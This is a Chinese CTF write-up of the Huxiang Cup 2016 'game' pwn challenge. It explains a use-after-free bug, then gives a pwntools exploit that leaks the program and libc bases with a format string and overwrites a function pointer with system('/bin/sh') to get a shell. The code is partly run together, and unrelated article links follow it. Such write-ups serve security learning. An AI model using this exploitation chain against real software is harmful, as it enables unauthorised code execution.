0x00 分析程序

根据分析,我们可以得到以下重要数据结构

0x01 发现漏洞

1.在武器使用次数耗光后,程序会把存储该武器的堆块free,在free的时候没有清空指针,造成悬挂指针

2.comment存储在一个大小和武器块一样的堆块中,我们武器释放后再执行commit函数,那么武器堆块和comment堆块是同一块堆块

0x02 漏洞利用

1.在comment函数中向堆块中写入16字节的ascii码,再利用show_weapon函数把武器数据结构中的attack函数地址泄露出来,由此可以计算得到程序基址

2.利用程序基址计算出printf地址,再将printf函数写到attack函数处,再调用attack函数(相当于调用printf函数)把memset函数地址打印出来,由此可以计算出libc基址

3.得到了libc基址,就可以根据libc.so库算出system_addr,再利用comment将system函数写到attack函数处,在堆块中写入‘/bin/sh’,调用attack函数便可得到shell.

0x03 exp

from pwn import *

t = process('./game')
libc = ELF('./libc.so')
context.log_level = "debug" def warehouse(count):
t.recvuntil('$')
t.sendline('build_warehouse')
t.recvuntil('want have?\n')
t.sendline(str(count)) def buy(name, tid):
t.recvuntil('$')
t.sendline('buy_weapon')
t.recvuntil('buy?\n')
t.sendline(name)
t.recvuntil('weapon?\n')
t.sendline(str(tid)) def show(tid):
t.recvuntil('$')
t.sendline('show_weapon')
t.recvuntil('warehouse\n')
t.sendline(str(tid)) def attack(tid):
t.recvuntil('$')
t.sendline('attack_boss')
t.recvuntil('warehouse\n')
t.sendline(str(tid)) def comment(co_buff):
t.recvuntil('$')
t.sendline('comment')
t.recvuntil('?\n')
t.send(co_buff) def leak_addr(addr,printf_plt):
co_buff = ''
co_buff += '%%%d$s.' % (7)
co_buff = co_buff.ljust(16, '\x00')
co_buff += p32(printf_plt)
co_buff += '\n'
comment(co_buff)
show(0)
t.sendline('attack_boss') t.recvuntil('warehouse\n')
payload = ''
payload += ''* 0x04
payload += p32(addr)
t.sendline(payload)
data = t.recv(4)
back_addr = u32(data[:4])
return back_addr def main():
t.recvuntil('name?\n')
t.sendline('xt')
warehouse(3)
buy('UMP45', 0)
attack(0)
attack(0)
attack(0)
show(0) co_buff = ''
co_buff += 'd' * 0x16 + '\n'
comment(co_buff)
show(0)
t.recvuntil('Weapon name: ')
t.recv(16)
data = t.recvuntil('price:')[:-7] addr = u32(data[:4].ljust(4, '\x00'))
proc_addr = addr - 0x1287
success('proc_addr:' + hex(proc_addr)) memset_got = 0x00002154 + proc_addr
printf_plt = 0x00000710 + proc_addr
memset_addr = leak_addr(memset_got,printf_plt) offset_memset = libc.symbols['memset']
offset_system = libc.symbols['system'] libc_base = memset_addr - offset_memset
system_addr = libc_base + offset_system
success('libc_base:' + hex(libc_base))
success('system_addr:' + hex(system_addr)) co_buff = ""
co_buff += "/bin/sh;"
co_buff = co_buff.ljust(16, '\x00')
co_buff += p32(system_addr)
co_buff += "\n"
comment(co_buff)
t.sendline("attack_boss")
t.recvuntil("warehouse\n")
payload = ""
payload += ""
t.sendline(payload) t.interactive() if __name__ == '__main__':
main()

uaf-湖湘杯2016game_学习的更多相关文章

  1. CTF 湖湘杯 2018 WriteUp (部分)

    湖湘杯 2018 WriteUp (部分),欢迎转载,转载请注明出处! 1.  CodeCheck(WEB) 测试admin ‘ or ‘1’=’1’# ,php报错.点击登录框下面的滚动通知,URL ...

  2. 2017湖湘杯复赛writeup

    2017湖湘杯复赛writeup 队伍名:China H.L.B 队伍同时在打 X-NUCA  和 湖湘杯的比赛,再加上周末周末周末啊,陪女朋友逛街吃饭看电影啊.所以精力有点分散,做出来部分题目,现在 ...

  3. 2019 湖湘杯 Reverse WP

    0x01 arguement 下载链接:https://www.lanzous.com/i7atyhc 1.准备 获取到信息: 32位的文件 upx加密文件 在控制台打开文件 使用"upx ...

  4. 【CTF】2019湖湘杯 miscmisc writeup

    题目来源:2019湖湘杯 题目链接:https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id= ...

  5. 2017湖湘杯Writeup

    RE部分 0x01 Re4newer 解题思路: Step1:die打开,发现有upx壳. Step2:脱壳,执行upx -d 文件名即可. Step3:IDA打开,shift+F12看字符串. 点进 ...

  6. Bugku Writeup —文件上传2(湖湘杯)

    我们先来看下题目,题目说明是文件上传 我们可以尝试通过构造payload来进行测试 php://filter/read=convert.base64-encode/resource=flag 获取到f ...

  7. 2018湖湘杯web、misc记录

    1.题目名 Code Check 打开题目,右键发现有id参数的url,简单base64解码以后发现不是明文,说明利用了其他的加密方式,那么应该会有具体的加密方式给我们,于是试试常见的文件泄露,可以发 ...

  8. 湖湘杯2020_ReMe

    查壳后发现是由Python2.7环境下编译得到的exe可执行文件 由此想到可将exe转为pyc文件再反编译成py文件 且该方法只适用于py2 无混淆 因为py3的字节码结构有些许变化 step1: 在 ...

  9. 湖湘杯2020 writeup

    这个平台中间卡的离谱,卡完过后交了flag分还掉了 Web 题目名字不重要 也算是非预期吧,赛后y1ng师傅也说了因为要多端口环境必须这样配,预期解很难 NewWebsite 后台弱口令admin a ...

随机推荐

  1. jqgrid 不能选中行, 每次点击单元格都自动选中第一行

    最使用jqgrid表格插件写了一个功能.功能完成后显示一切正常,但是经过测试后发现,每次点击数据行时,都会自动选中第一行,无法选中其他数据行.经过一番探索,最终发现是加载进来的字段没有主键导致了这个问 ...

  2. BCG使用

    VC界面库分两大类:一,Direct UI,优点:界面绚丽.二,MFC扩展库.优点:1,方便用户.2,减少开发成本.3,界面相对好看.BCG属于后者,非常是否适合优化办公软件界面. 作者在2008年以 ...

  3. 2014-7-17 NOIP模拟赛

    czy的后宫3(莫队) [题目描述] 上次czy在机房妥善安排了他的后宫之后,他发现可以将他的妹子分为c种,他经常会考虑这样一个问题:在[l,r]的妹子中间,能挑选出多少不同类型的妹子呢? 注意:由于 ...

  4. 自然语言处理(二)——PTB数据集的预处理

    参考书 <TensorFlow:实战Google深度学习框架>(第2版) 首先按照词频顺序为每个词汇分配一个编号,然后将词汇表保存到一个独立的vocab文件中. #!/usr/bin/en ...

  5. go系列(4)- go环境和docker容器的使用

    这篇文章讲述把go环境及beego框架装进容器.docker的安装该篇不讲述,请自行查阅.本篇是基于docker已经安装的前提. 跟据前三篇系列,然后写Dockerfile,一般是到项目的根目录下 1 ...

  6. 3.KPCR

    KPCR: CPU控制区(Processor Control Region) 当线程进入0环时, FS:[0]指向KPCR(3环时FS[0]-> TEB)每个CPU都有一个KPCR结构体(一个核 ...

  7. Codeforces Round #497 (Div. 2)B. Turn the Rectangles

    Bryce1010模板 http://codeforces.com/contest/1008/problems #include <bits/stdc++.h> using namespa ...

  8. max713镍氢电池充电管理IC

    PDF:https://datasheets.maximintegrated.com/en/ds/MAX713SWEVKIT.pdf http://www.ixueshu.com/document/b ...

  9. 微信小程序开发-微信登陆流程

    我们需要一个标识来记录用户的身份的唯一性,在微信中unionId就是我们所需要的记录唯一ID,那么如何拿到unionId就成了关键,我将项目分为小程序和 后台PHP代码两部分来讲. 从小程序代码说起 ...

  10. codeforces1025

    hackforces + fstforces A 很明显当有一个字母出现次数>1时即合法 $n = 1$的情况需要特判 #include<cstdio> #include<ve ...